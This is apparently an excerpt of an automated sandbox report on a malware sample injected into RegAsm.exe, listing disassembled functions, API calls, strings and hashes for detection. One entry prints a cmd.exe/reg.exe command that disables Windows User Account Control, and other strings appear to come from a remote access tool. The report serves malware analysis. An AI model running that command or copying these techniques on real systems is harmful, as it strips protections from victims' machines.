                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                • String ID:
                                                                • API String ID: 493672254-0
                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                • _free.LIBCMT ref: 004482CC
                                                                • _free.LIBCMT ref: 004482F4
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                • _abort.LIBCMT ref: 00448313
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                • String ID: 0$MsgWindowClass
                                                                • API String ID: 2877667751-2410386613
                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                Strings
                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateProcess
                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                • API String ID: 2922976086-4183131282
                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                • SG, xrefs: 00407715
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 0-643455097
                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                • String ID: KeepAlive | Disabled
                                                                • API String ID: 2993684571-305739064
                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                Strings
                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                • API String ID: 3024135584-2418719853
                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                Function 0040140A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetCursorInfo$User32.dll$`Mw
                                                                • API String ID: 1646373207-2986171508
                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 0044943D
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 4269425633-0
                                                                • Opcode ID: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                • Opcode Fuzzy Hash: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                • __freea.LIBCMT ref: 0045129D
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                • String ID:
                                                                • API String ID: 313313983-0
                                                                • Opcode ID: bc12763b399a6208d318c17ed7bb5e89049be1fb7aa338cc20da594798c3f730
                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                • Opcode Fuzzy Hash: bc12763b399a6208d318c17ed7bb5e89049be1fb7aa338cc20da594798c3f730
                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                • _free.LIBCMT ref: 0044F43F
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: 5500135b4103b87c343acc58efff57d349ffb1ffd5e47bf571a7f4768ca97117
                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                • Opcode Fuzzy Hash: 5500135b4103b87c343acc58efff57d349ffb1ffd5e47bf571a7f4768ca97117
                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                • _free.LIBCMT ref: 00448353
                                                                • _free.LIBCMT ref: 0044837A
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
